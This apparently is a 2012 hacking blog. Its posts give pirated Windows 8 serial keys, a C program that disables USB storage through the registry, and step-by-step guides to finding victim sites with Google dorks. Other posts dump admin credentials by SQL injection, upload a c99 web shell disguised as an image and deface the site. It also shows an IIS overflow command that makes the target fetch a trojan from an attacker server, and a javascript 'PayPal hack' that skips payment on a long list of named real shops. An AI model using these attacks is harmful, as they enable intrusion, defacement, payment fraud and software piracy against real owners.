Ms Windows Support

  • Subscribe to our RSS feed.
  • Twitter
  • StumbleUpon
  • Reddit
  • Facebook
  • Digg

Saturday, 10 November 2012

Windiws 8 pro Activator 100% working

Posted on 20:43 by Unknown
ALL FEATURES UNLOCK 100% TRUE
Windows 8 New Features

  •     Language and standards support.
  •     Windows Store
  •     Shell and user interface
  •     User login
  •     Microsoft account integration
  •     Multi-monitor support
  •     File Explorer
  •     Task Manager
  •     Family Safety
  •     ARM architecture
  •     Boot security
  •     File History 
  •     Refresh and Rese
  •     Shorter boot times
  •     USB 3.0
  •     Video subsystem
  •     Windows To Go
  •     Hyper-V
  •     Virtual hard disk format
  •     Storage Spaces
  •     Atractive interface
  •   

Serial Key
  • XKY4K-2NRWR-8F6P2-448RF-CRYQH
  • NG4HW-VH26C-733KW-K6F98-J8CK4
  • RR3BN-3YY9P-9D7FC-7J4YF-QGJXW



                

If Any kink not working plz type in comment   .                                  
Read More
Posted in CRACKS | No comments

Monday, 5 November 2012

Online Random Password Generator

Posted on 00:41 by Unknown
Random Password Generater







Password Length:



Home
Read More
Posted in Other | No comments

Monday, 17 September 2012

List of Command Prompt Commands

Posted on 12:51 by Unknown

:- Accessibility Options : access.cpl
:- Add Hardware: hdwwiz.cpl
:- Add / Remove Programs: appwiz.cpl
:- Administrative Tools : control admintools
:- Automatic Updates: wuaucpl.cpl
:- Wizard file transfer Bluethooth: fsquirt
:- Calculator: calc
:- Certificate Manager: certmgr.msc
:- Character: charmap
:- Checking disk : chkdsk
:- Manager of the album (clipboard) : clipbrd
:- Command Prompt : cmd
:- Service components (DCOM) : dcomcnfg
:- Computer Management : compmgmt.msc
:- DDE active sharing : ddeshare
:- Device Manager : devmgmt.msc
:- DirectX Control Panel (if installed) : directx.cpl
:- DirectX Diagnostic Utility : dxdiag
:- Disk Cleanup : cleanmgr
:- System Information=dxdiag
:- Disk Defragmenter : dfrg.msc
:- Disk Management : diskmgmt.msc
:- Partition manager : diskpart
:- Display Properties : control desktop
:- Properties of the display (2) : desk.cpl
:- Properties display (tab "appearance") : control color
:- Dr. Watson: drwtsn32
:- Manager vĂ©rirficateur drivers : check
:- Event Viewer : Eventvwr.msc
:- Verification of signatures of files: sigverif
:- Findfast (if present) : findfast.cpl
:- Folder Options : control folders
:- Fonts (fonts) : control fonts
:- Fonts folder windows : fonts
:- Free Cell ...: freecell
:- Game Controllers : Joy.cpl
:- Group Policy (XP Pro) : gpedit.msc
:- Hearts (card game) : mshearts
:- IExpress (file generator. Cab) : IExpress
:- Indexing Service (if not disabled) : ciadv.msc
:- Internet Properties : inetcpl.cpl
:- IPConfig (display configuration): ipconfig / all
:- IPConfig (displays the contents of the DNS cache): ipconfig / displaydns
:- IPConfig (erases the contents of the DNS cache): ipconfig / flushdns
:- IPConfig (IP configuration cancels maps): ipconfig / release
:- IPConfig (renew IP configuration maps) : ipconfig / renew
:- Java Control Panel (if present) : jpicpl32.cpl
:- Java Control Panel (if present) : javaws
:- Keyboard Properties: control keyboard
:- Local Security Settings : secpol.msc
:- Local Users and Groups: lusrmgr.msc
:- Logout: logoff
:- Microsoft Chat : winchat
:- Minesweeper (game): winmine
:- Properties of the mouse: control mouse
:- Properties of the mouse (2): main.cpl
:- Network Connections : control NetConnect
:- Network Connections (2): ncpa.cpl
:- Network configuration wizard: netsetup.cpl
:- Notepad : notepad
:- NView Desktop Manager (if installed): nvtuicpl.cpl
:- Manager links: packager
:- Data Source Administrator ODBC: odbccp32.cpl
:- Screen Keyboard: OSK
:- AC3 Filter (if installed) : ac3filter.cpl
:- Password manager (if present): Password.cpl
:- Monitor performance : perfmon.msc
:- Monitor performance (2): perfmon
:- Dialing Properties (phone): telephon.cpl
:- Power Options : powercfg.cpl
:- Printers and Faxes : control printers
:- Private Character Editor : eudcedit
:- Quicktime (if installed) : QuickTime.cpl
:- Regional and Language Options: intl.cpl
:- Editor of the registry : regedit
:- Remote desktop connection : mstsc
:- Removable Storage: ntmsmgr.msc
:- requests the operator to removable storage: ntmsoprq.msc
:- RSoP (traduction. ..) (XP Pro): rsop.msc
:- Scanners and Cameras : sticpl.cpl
:- Scheduled Tasks : control schedtasks
:- Security Center : wscui.cpl
:- Console management services: services.msc
:- shared folders : fsmgmt.msc
:- Turn off windows : shutdown
:- Sounds and Audio Devices : mmsys.cpl
:- Spider (card game): spider
:- Client Network Utility SQL server : cliconfg
:- System Configuration Editor : sysedit
:- System Configuration Utility : msconfig
:- System File Checker (SFC =) (Scan Now) : sfc / scannow
:- SFC (Scan next startup): sfc / scanonce
:- SFC (Scan each dĂ©marraget) : sfc / scanboot
:- SFC (back to default settings): sfc / revert
:- SFC (purge cache files): sfc / purgecache
:- SFC (define size CAHC x) : sfc / cachesize = x
:- System Properties : sysdm.cpl
:- Task Manager : taskmgr
:- Telnet client : telnet
:- User Accounts : nusrmgr.cpl
:- Utility Manager (Magnifier, etc) : utilman
:- Windows firewall (XP SP2) : firewall.cpl
:- Microsoft Magnifier: magnify
:- Windows Management Infrastructure: wmimgmt.msc
:- Protection of the accounts database: syskey
vWindows update: wupdmgr
:- Introducing Windows XP (if not erased) : tourstart
:- Wordpad : write
:- Date and Time Properties : timedate.cpl
Read More
Posted in Other | No comments

Make USB-Pendrive Virus

Posted on 12:37 by Unknown

Virus is a program which infects computer, in different way. I am explaining about a Virus Which can easily be made in C or C++, ,When we have run .exe file of this Pendrive-usb virus then when we connect pendrive with our computer usb,it will not be connected. Operating System would not be able to detect pendrive.

Code is written to directly change the usb registry option and change its key. Not going to explain about registry in detail now, later will explain.

1. Creating usb-pendrive Virus :-


:- Install Turbo C or C++
:- Open TC.exe and there write the coding


#include
void main()
{

system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet
\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 4 \/f");
} 

:-  Above Line system(".....................");  it is in one Line
:-  Save The Above Program as usbblock.c or any other name.
:-  Compile and Run the above Program
:-  Congratulation! you are succesfull to create the usb-pendrive Virus
:-  to drive where C is installed (Open TC folder) and then BIN ,have that usb-pendrive virus usbblock.exe to be used..........
Run that usbblock.exe in your computer to test.
:-  Pendrive to your computer usb ....OH! Shit Pendrive doesn't get detected...virus
:-  fect any other computer as it is only for educational purpose.


2. To reverse the effect of USB-Pendrive Virus (Removal of that Virus) :-

:-  Install Turbo C or C++
:-  Open TC.exe and there write the coding

#include
void main()
{

system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\
Services\\USBSTOR \/v Start \/t REG_DWORD \/d 3 \/f");
} 

Above Line system("....................."); it is in one Line


:-  Save The Above Program as unblockusb.c or any other name.
:-  Compile and Run the above Program
:-  Congratulation! you are succesfull to create .exe file to unblock USB
:-   Now go to drive where C is installed (Open TC folder) and then BIN ,have that unblockusb.exe to be used.......... 
:-  Run that unblockusb.exe to reverse the effect of usbblock.exe.






Read More
Posted in Virus | No comments

Tuesday, 7 August 2012

Hack Website By Uploding shell – Tutorial

Posted on 22:27 by Unknown

Google Dork : intitle:Powered By phUploader 

Go to Google.com and enter this DOrk, see serach results 
Exploit URL : 
http://{site.comt}/ path/upload.php
or 
http://site.com/upload.php

select any website and upload your file there 
website allow to upload .jpg .png .gif anf .png files only
anyway you can upload your deface in .jpg and mirrOr website like 
zone-h accept it as defcaement, if want to upload a shell then upload as 
shell.php.jpg

after uploading your file you'll got a message 
Your file(s) have been uploaded!


see the Example Link Below this message For view Your uploaded File

Live Demo ~ http://Victimsite.com/phUploader.php

Uploaded File ~ http://www.Victimsite.com/uploads/1321616908.jpg

Download Shell
Read More
Posted in Hacking Tutorials | No comments

How To Upload Shell and Deface Website – Tutorial

Posted on 22:16 by Unknown
What we need:

1-A Shell (Will be provided)


2-A website vulnerable to SQLi


3-Image or File upload area on that Vulnerable website

So firstly download the shell here.

Download

What is Shell ?

A shell script is a script written for the shell, or command line interpreter, of an operating system. It is often considered a simple domain-specific programming language. Typical operations performed by shell scripts include file manipulation, program execution, and printing text.
This is a plain c99 shell, BUT it is Undetected so you should not get a warning from a anti virus if you download it. (update: not Undetected anymore )

I am not going to explain SQLi just how to deface.

Sql Tut- http://sumitcrackzone.blogspot.in/2012/08/how-to-hack-website-with-sql-injection.html

So now go get yourself a vulnerable site, hack it and get the Admin Login details and get the Admin Page address.

Now login to the admin page with the admin details you got.

Go through the admin page until you find a place where you can upload a picture (Usually a picture).

Now you have to upload the shell. Right if you don’t get an error it is all good.

Now to find the shell

Go through the site until you find any image and if you are using firefox Right

- Click on it and “Copy Image Location”

Make a new tab and paste it there.

It will probably look something like this:

http://www.example.com/images/photonamehere.jpg

So now that we know that change “/photonamehere.jpg” to “/c99ud.php.jpg” (Without Qoutes)

Now a page will come up looking like this:


Does probably not look like that but will look similar.

Now you have access to all the files on the site
What you want to do is now,
Find index.php or whatever the main page is, and replace it with your HTML code for your Deface Page.

Then you can either delete all the other files OR (and I recommend this) Let it redirect to the main page.

Keep in mind:

• Change Admin Username and Password

•The people have FTP access so you need to change that Password too .

•Always use a Proxy or VPN
Read More
Posted in Hacking Tutorials | No comments

How To Hack Web Servers - tutorial

Posted on 22:08 by Unknown

Hacking Tool: IISHack.exe

iishack.exe overflows a buffer used by IIS http daemon,
allowing for arbitrary code to be executed.
c:\ iishack www.yourtarget.com 80 www.yourserver.com/thetrojan.exe
www.yourtarget.com is the IIS server you're hacking, 80 is the port its listening on,
 www.yourserver.com is some webserver with your trojan or custom script (your own, or another), and /thetrojan.exe is the path to that script.

"IIS Hack" is a buffer overflow vulnerability exposed by the way IIS handles requests with .HTR extensions.
A hacker sends a long URL that ends with ".HTR". IIS interprets it as a file type of HTR and invokes the ISM.DLL to handle the request.

Since ISM.DLL is vulnerable to a buffer overflow, a carefully crafted string can be executed in the security context of IIS,

which is privileged. For example, it is relatively simple to include in the exploit code a sequence of commands that will open a TCP/IP connection,
download an executable and then execute it.
This way,

any malicious code can be executed.
A sample exploit can be constructed as shown below:
To hack the target site and attacker's system running a web server can use iishack.exe and ncx.exe.
To begin with, the ncx.exe is configured to run from the root directory.
IIShack.exe is then run against the victim site.
c:\>iishack.exe  80 /ncx.exe
The attacker can then use netcat to evoke the command shell
c:\>nc  80
He can proceed to upload and execute any code of his choice and maintain a backdoor on the target site.


IPP Buffer Overflow Countermeasures

Install latest service pack from Microsoft.
Remove IPP printing from IIS Server
Install firewall and remove unused extensions
Implement aggressive network egress filtering
Use IISLockdown and URLScan utilities
Regularly scan your network for vulnerable servers
Without any further explanation,
the first countermeasure is obviously to install the latest service packs and hotfixes.
As with many IIS vulnerabilities, the IPP exploit takes advantage of a bug in an ISAPI DLL that ships with IIS 5 and is configured by default to handle requests for certain file types.
This particular ISAPI filter resides in C: \WINNT\System32\msw3prt.dll and provides Windows 2000 with support for the IPP. If this functionality is not required on the Web server,
the application mapping for this DLL to .printer files can be removed (and optionally deleting the DLL itself) in order to prevent the buffer overflow from being exploited.
This is possible because the DLL will not be loaded into the IIS process when it starts up.
In fact, most security issues are centered on the ISAPI DLL mappings,
making this one of the most important countermeasure to be adopted when securing IIS.
Another standard countermeasure that can be adopted here is to use a firewall and remove any extensions that are not required.
Implementing aggressive network egress can help to a certain degree.
With IIS, using IISLockdown and URLScan - (free utilities from Microsoft) can ensure more protection and minimize damage in case the web server is affected.
Microsoft has also released a patch for the buffer overflow,
 but removing the ISAPI DLL is a more proactive solution in case there are additional vulnerabilities that are yet to be found with the code.


ISAPI DLL Source disclosures

Microsoft IIS 4.0 and 5.0 can be made to disclose fragments of source code which should otherwise be in accessible.
This is done by appending "+.htr" to a request for a known .asp (or .asa, .ini, etc) file.
appending this string causes the request to be handled by ISM.DLL, which then strips the '+.htr' string and may disclose part or all of the source of the .asp file specified in the request.
IIS supports several file types that require server-side processing. When a web site visitor requests a file of one of these types, an appropriate filter DLL processes it. Vulnerability exists in ISM.DLL,
the filter DLL that processes .HTR files. HTR files enable remote administration of user passwords.
HTR files are scripts that allow Windows NT password services to be provided via IIS web servers. Windows NT users can use .HTR scripts to change their own passwords, and administrators can use them to perform a wide array of password administration functions.
HTR is a first-generation advanced scripting technology that is included in IIS 3.0, and still supported by later versions of IIS for backwards compatibility. However, HTR was never widely adopted, and was superceded by Active Server Pages (ASP) technology introduced in IIS 4.0.

Attack Methods


Exploit / Attack Methodology
By making a specially formed request to IIS, with the name of the file and then appending around 230 + " %20 " (these represents spaces) and then appending " .htr " this tricks IIS into thinking that the client is requesting a " .htr " file . The .htr file extension is mapped to the ISM.DLL ISAPI Application and IIS redirects all requests for .htr resources to this DLL.

ISM.DLL is then passed the name of the file to open and execute but before doing this ISM.DLL truncates the buffer sent to it chopping off the .htr and a few spaces and ends up opening the file whose source is sought. The contents are then returned. This attack can only be launched once though, unless the web service started and stopped. It will only work when ISM.DLL first loaded into memory.

"Undelimited .HTR Request" vulnerability: The first vulnerability is a denial of service vulnerability. All .HTR files accept certain parameters that are expected to be delimited in a particular way. This vulnerability exists because the search routine for the delimiter isn't properly bounded. Thus, if a malicious user provided a request without the expected delimiter, the ISAPI filter that processes it would search forever for the delimiter and never find it.

If a malicious user submitted a password change request that lacked an expected delimiter, ISM.DLL, the ISAPI extension that processes .HTR files, would search endlessly for it. This would prevent the server from servicing any more password change requests. In addition, the search would consume CPU time, so the overall response of the server might be slowed.
The second threat would be more difficult to exploit. A carefully-constructed file request could cause arbitrary code to execute on the server via a classic buffer overrun technique. Neither scenario could occur accidentally. This vulnerability does not involve the functionality of the password administration features of .HTR files.

".HTR File Fragment Reading" vulnerability: The ".HTR File Fragment Reading" vulnerability could allow fragments of certain types of files to be read by providing a malformed request that would cause the. HTR processing to be applied to them. This vulnerability could allow a malicious user to read certain types of files under some very restrictive circumstances by levying a bogus .HTR request. The ISAPI filter will attempt to interpret the requested file as an .HTR file, and this would have the effect of removing virtually everything but text from a selected file. That is, it would have the effect of stripping out the very information that is most likely to contain sensitive information in .asp and other server-side files.

The .htr vulnerability will allow data to be added, deleted or changed on the server, or allow any administrative control on the server to be usurped. Although .HTR files are used to allow web-based password administration, this vulnerability does not involve any weakness in password handling.
"Absent Directory Browser Argument" vulnerability: Among the default HTR scripts provided in IIS 3.0 (and preserved on upgrade to IIS 4.0 and IIS 5.0) were several that allowed web site administrators to view directories on the server. One of these scripts, if called without an expected argument, will enter an infinite loop that can consume all of the system's CPU availability, thereby preventing the server from responding to requests for service.
Read More
Posted in Hacking Tutorials | No comments

How To Hack website With SQL Injection : Full Tutorial

Posted on 11:54 by Unknown

I'm posting this here coz this tut explains everything step by step. but most of the sql tuts ends when we find the password hash. So newbees dnt know wat to do after that. In this tut i'm gonna explain how to deface a website from scratch hope you fill find this usefull....

If you find this tut usefull please post a comment....

1) FINDING THE TARGET AND GETTING THE ADMIN PASSWORD


First we must find our target website to do that you can use this "dorks".
I'll give some dorks here copy anyone of it and paste it in google and search.
Code:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=

you can find lots of dorks here..(use them without the " " marks)
Code:
Click Here To Download

1). Check for vulnerability

Let's say that we have some site like this

http://www.site.com/news.php?id=5

Now to test if is vulrnable we add to the end of url ' (quote),

and that would be http://www.site.com/news.php?id=5'

so if we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar

that means is vulrnable to sql injection

2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result)

so how to use it? Well just incrementing the number until we get an error.

http://www.site.com/news.php?id=5 order by 1/* <-- no error
http://www.site.com/news.php?id=5 order by 2/* <-- no error
http://www.site.com/news.php?id=5 order by 3/* <-- no error
http://www.site.com/news.php?id=5 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)

that means that the it has 3 columns, cause we got an error on 4.

3). Check for UNION function


With union we can select more data in one sql statement.
so we have
http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works

4). Check for MySQL version


http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try --
it's a comment and it's important for our query to work properly.

let say that we have number 2 on the screen, now to check for version we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.

it should look like this
http://www.site.com/news.php?id=5 union all select 1,@@version,3/*

if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."

i didn't see any paper covering this problem, so i must write it

what we need is convert() function

i.e.

 http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()

 i.e.

http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version

5). Getting table and column name
well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s ...

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...

i.e would be

http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good )

we know that table admin exists...


now to check column names.


http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)

we get username displayed on screen, example would be admin, or superadmin etc...

now to check if column password exists

http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up

i.e md5 hash, mysql hash, sha1...

now we must complete query to look nice

for that we can use concat() function (it joins strings)

i.e

http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ascii value for : )


http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

now we get dislayed username:password on screen, i.e admin:admin or admin:somehash

when you have this, you can login like admin or some superuser

if can't guess the right table name, you can always try mysql.user (default)

it has user i password columns, so example would be

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like i said before i'm gonna explain how to get table and column names
in MySQL > 5.

For this we need information_schema. It holds all tables and columns in database.

to get tables we use table_name and information_schema.tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get the first table from information_schema.tables

displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1 (get 1 result starting from the 0th)

now to view the second table, we change limit 0,1 to limit 1,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc...

To get the column names the method is the same.

here we use column_name and information_schema.columns

the method is same as above so example would be


http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

the first column is diplayed.

the second one (we change limit 0,1 to limit 1,1)

ie.


http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

the second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc...

if you wanna display column names for specific table use this query. (where clause)

let's say that we found table users.

i.e

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note that this won't work if the magic quotes is ON.

let's say that we found colums user, pass and email.

now to complete query to put them all together

for that we use concat() , i decribe it earlier.

i.e


http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*

what we get here is user:pass:email from table users.

example: admin:hash:whatever@blabla.com

** if you are too lazy for doing above stuff you can use tools they will do all the job:
1) Exploit scanner (this will find vulnerable websites)
Code:

Click Here To Download

2) SQLi helpper (this tool will do all the injecting job and get you the pass or hash)
Code:

Click Here To Download

*** use the tools only if you are new to hacking. Do it manually thats the thrill and that is real hacking. When you do it manually you will understand the concept.

in some websites you can directly see the password. but most of the websites encrypt them using MD5. so u hav to crack the hash to get the password. to crack the password there are three ways
1) check the net whether this hash is cracked before:
Code:

Click Here To Download

2) crack the password with the help of a site:
Code:

Click Here To Download 
Click Here To Download 

3) use a MD5 cracking software:
Code:

Click Here To Download 
Password = OwlsNest

2) DEFACING THE WEBSITE

after getting the password you can login as the admin of the site. But first you have to find the admin login page for the site. there r three methods to find the admin panel.
1) you can use an admin finder website:
Code:

Click Here To Download 

2) you can use an admin finder software:
Code:

Click Here To Download 

after logging in as the admin you can upload photos to the site. so now you are going to upload a shell into the site using this upload facility.

dowload the shell here(shells are php scripts which affects websites so it will be detected as trojans but no need to worry i take the responsibility):

Code:
Click Here To Download 
extract it you will get a c99.php upload it.
some sites wont allow you to upload a php file. so rename it as c99.php.gif
then upload it.

after that go to http://www.site.com/images (in most sites images are saved in this dir but if you cant find c99 there then you have to guess the dir)
find the c99.php;.gif and click it..
now you can see a big control pannel....
now you can do what ever you want to do...
search for the index.html file and replace it with your own file. so if any one goes to that site they will see your page....

after doing this click logout.... thats it you are done..
Read More
Posted in Hacking Tutorials | No comments

Saturday, 21 July 2012

Paypal Hack By JavaScript

Posted on 22:22 by Unknown
First search any vulnerable website and then paste the below script in the address bar and hit enter

javascript:top.location=document.getElementsByName('return')[0].value; javascript:void(0);


After hitting enter,enjoy the free product

Here is the most updated list of website which are vulnerable to this javascript;


http://www.businesslistsforsale.com/Specialty-Lists.shtml
http://freewaretools.net/search/“this-order-button-requires-a-javascript-enabled-browser-submitter/
http://freewaretools.net/search/this-order-button-requires-a-javascript-enabled-browser-instant-download/
http://freewaretools.net/search/this-order-button-requires-a-javascript-enabled-browser-seo/
http://www.orderproductsdirect.com/Instantdownload.htm
http://www.wewritequalityarticles.com/
http://www.buildmeacashblog.com/
http://www.lynkstatrak.com/samples-1.htm
http://ready-made-income-sites-at.yourglobalcompany.com/
http://www.golfersdream.com/advertising_ezine.htm
http://www.claypals.net
http://www.angelfire.com/ab7/celebrities/CelebritiesMailingList.htm
http://doitupamerica.com/singlempthrees/
http://www.singlelives.com/ama-ad-pacs-and-single-ad-prices.htm
http://www.egamingsupply.com/cheap-power-leveling/ffxi
http://www.dxproscripts.com/
http://www.rduanewilling.com/order.htm
http://treasuresignsandsymbols.treasure-legend.com/
http://hostingwebserver.com/extras.html
http://www.bugs-n-blooms.com/topsite/girlsroomdecortopads.htm
http://mall.topcities.com/webtools.htm
http://minisitesunlimited.com/
http://www.rphinc.net/
http://www.productcreationpro.com/product-only-no-frills.htm
http://blairin.com/music.html
http://www.softwarewarrioress.com/newbies.html
http://www.2nd-income-solutions.com/Advertising_Rates_Ezine.htm
http://my1040.ws/registration.htm
http://www.buyfanpagetraffic.com/
http://myforexedge.com/
http://www.doctorisin.net/
http://www.peigifts.com/
http://www.alternative-spiritual-healing.com/self-help-store.html
http://www.cbsqueezevideos.com/
http://www.magicities.com/streetmagic/
http://www.digitalproductscenter.com/videos/plr-cash-machine/index.html
http://www.stuccotools.com/diana-gun-hopper/
http://www.wittytemplates.com/build_your_ebay_empire2.html
http://lifechurchmv.com/audio/
http://ironoverload.info/ironichealth/
http://resilient2disaster.com/hwy/i90.php?y-browser-n95
http://www.dubai-mobiles.net/ebooks.htm
http://www.bensonawong.com/
http://businessuncommon.com/ebay3/
http://www.mindpower4you.com/publicspeakingaudio.html
http://turnbuckleman03a.com/imagecreator/
http://www.yourmodern.com/business.html
http://www.lightsoflove.us/LLAW/vol105.php
http://thegamblinghouse.net/years-scroll-array-items-javascript/
http://www.pitbullcoaching.com/
http://instantnichewebsite.com/
http://www.cmkoch.biz/postingads.html
http://www.matthewandrobyn.com/matts music/R2C.html
http://www.z2wealthsystem.com/TwitterVideoTutorials/
http://www.johnmelanson.info/ResourceExplosion-Web/Index.html
http://www.johnkoehler.com/payments.htm
http://www.cdproductsonline.com/computers/sqpage/index.htm
http://www.auctionkits.com/kits/kit-b/index.htm
http://www.eternity-yoga.com/yoga-workshops.html
http://www.manuscriptreviews.com/manuscript-reviews-services.html
http://tylersanford.com/nace-internet-browsers-downloads/
http://www.pleazz.com/craigs/PR_6_Backlinks.htm
http://www.mastersofnewthought.com/gwaysignup.html
http://utilityspot.com/signup.htm
http://www.domaincity.ws/
http://thebestreps.com/gonzo-dd-wrt-enable-dhcp-with-option-150/
http://rumblesfromthejungle.com/gmkt_v1.htm
http://www.jonathanhendricks.com/webmaster/
http://www.earneasymoneynow.com/webtools/webtools.htm
http://karinsbutik.com/fortnight-bayview-landing-in-virginia/
http://www.snouthouse.com/order.htm
http://mothersandmaidens.com/clank-javascript-pop-sound/
http://www.real-freedom.com/OrigEprods/index.htm
http://knightthunder.com/listcleaner.php
http://www.mindblowingmindreading.com/findout.php
http://www.globaltechmktg.com/adassassin.html
http://www.videoepidemic.com/
http://www.thecossgroup.com/1/Auto/index.html
http://www.ebooks-made-easy.com/articlemachine/
http://chrisblackburn.com/culos-how-to-enable-regedit-services-in-win-xp/
http://www.9.77plr.com/NPWT.html
http://www.sfielite.com/sfiteamcoop.html
http://www.jcjmarketing.org/ordering.html
http://www.dawesrolls.com/dawes/INDEXonCD.aspx
http://www.psychotherapy-for-hypnotists.com/
http://www.qballcafe.com/
http://www.100hypnoticsalestips.com/
http://www.emailprocessinghomebiz.com/
http://www.resellerproducts.com/SocialMediaProfits/index.html
http://www.allthatwomenwant.com/recipecollection.htm
http://www.socialtrafficdetonator.com/
http://www.spiritsinpeace.com/richard-doiron/A-Winters-Soliloquy.html
http://www.trainmycat.com/order.htm
http://grinderswitch.com/
http://www.adsensetracker.info/
http://www.rverscorner.com/painless.html
http://www.militaryebooks.com/self-defense.php
http://www.desktop-wealth.com/soft/instant/ism/ism.htm
http://www.credit-improve.com/
http://www.ropercenter.uconn.edu/center/mitofsky_overview.html
http://coralarquitectura.cat/kombucha-pheromones-perfumes-buy-verified-byvisa-enabled/
http://www.linkpopularity.ws/
http://www.6figuremarketing.com/barrs/audio.html
http://www.woothosting.com/HOME/woot-hosting-templates-for-sale.htm
http://ideal-deals-resell-package.com/tr-order.htm
http://www.amazingmindreading.com/findout.php
http://inkingdaze.com/stu-fruit-spanish-abc-order/
http://jollyobama.com/obama_jockey_standup.html
http://www.aysdesigns.com/payments.html
http://www.becoming.net/mks/eebve.html
http://www.testedtough.com/
http://www.concentus-tech.com/software.html
http://www.rodgerhyatt.com/ens/
http://stopthecop.com/products.html
http://www.ebookstarter.com/register/purchase2.php
http://www.yourmodern.com/power.html
http://www.traildustmagazine.net/
http://twitter-automation-at.freeincomesite.com/
http://www.govtauctionfinder.com/
http://www.danbeal.com/2-buck-ad-sale.htm
http://www.whispersfromtheuniverse.com/
http://tatimages.com/ButterflyTattoosBlack/
http://appfactoryllc.com/des-autoclick-skate-beach/
http://www.weetagalong.com/
http://www.fortunesfromforums.com/ordernow.html
http://www.isnake.net/cd.htm
http://operations-guide.com/404tips/
http://www.netemailspider.com/buy_now.htm
http://www.peruviannaturistasmedicines.com/beauty_tips_female/aguaje_properties_hips_breasts_perfect_body_beauty.php
http://paylockgenerator.com/plg_order.html
http://shop.9-99.us/products/ccshadow.html
http://christians-r-us.net/kit.php
http://www.cnc-academy.com/cnc-programming-jobs.htm
http://cemeteryheadstones.org/
http://dnmoola.com/
http://forumnichegoldmine.com/
http://www.gambling-ebooks.info/mindyourownpokerbusiness.htm
http://trishas-creations.info/Notecards/
http://www.qqday.net/
http://webtoolskit.net/order1.html
http://avolonage.com/newproduct/socialnetwork/index.htm
http://www.wealth-ambition.com/mim/mentors-in-motion.htm
http://www.stuccotools.com/stucco-sprayer/
http://www.marketeknowledgy.com/kmt/
http://easyseductionsecrets.com/
http://www.savegainstax.com/interviewwiththepros/
http://www.websiteheaders.us/
http://www.whycredit.info/order.html
http://advancedinternetstudycourse.com/PriceTest/
http://living-4-life.info/healthy-you/index.html
http://creditcardcrazy.com/join2.html
http://www.web-biz-solutions.com/ebookstore/ebooks/order1.html
http://www.gratitudebook.com/
http://affiliateset.com/a-set-order-page1.html
http://newcreditfiletoday.com/
http://www.auctionkits.com/kits/kit-a/index.htm
http://video-squeeze-templates.com/
http://businessuncommon.com/plrmega/
http://www.desktop-wealth.com/soft/instant/affiliatemasker/ialm.htm
http://www.businesslistsforsale.com/US_Consumer_State_List_.shtml
http://www.spiritsinpeace.com/carolknepper/humanitarian-poetry.html
http://www.militaryebooks.com/military-fitness.php
http://www.softwarewarrioress.com/internet_marketing.html
http://traildustmagazine.net/bkissues.html
http://bensonawong.com/prayerandhope.html
http://www.weetagalong.com/test.htm
http://www.3.77plr.com/SecretsofSuccessEaster2010.html
http://www.ebooks-made-easy.com/membersite/
http://www.spiritsinpeace.com/carolknepper/nature-poems.html
http://www.weetagalong.com/features.htm
http://www.peruviannaturistasmedicines.com/treatment/insomnia_natural_treatments.php
http://businessuncommon.com/maillist/
http://www.adsensetracker.com/
http://www.jytra.com/low-cost-cad-software.html
http://www.cdproductsonline.com/turnkey/48websites/index.htm
http://hypnosisdepot.com/stage.htm
http://hypnosisdepot.com/ebooks.htm
http://www.ebooksgala.com/ebay8/eBayClassifiedAd.htm
http://www.businesslistsforsale.com/Specialty-Lists.shtml
http://www.wewritequalityarticles.com/
http://www.orderproductsdirect.com/Instantdownload.htm
http://ready-made-income-sites-at.yourglobalcompany.com/
http://wiriagar.com/waikoloa-scroll-iframe-with-javascript/
http://www.buildmeacashblog.com/
http://treasuresignsandsymbols.treasure-legend.com/
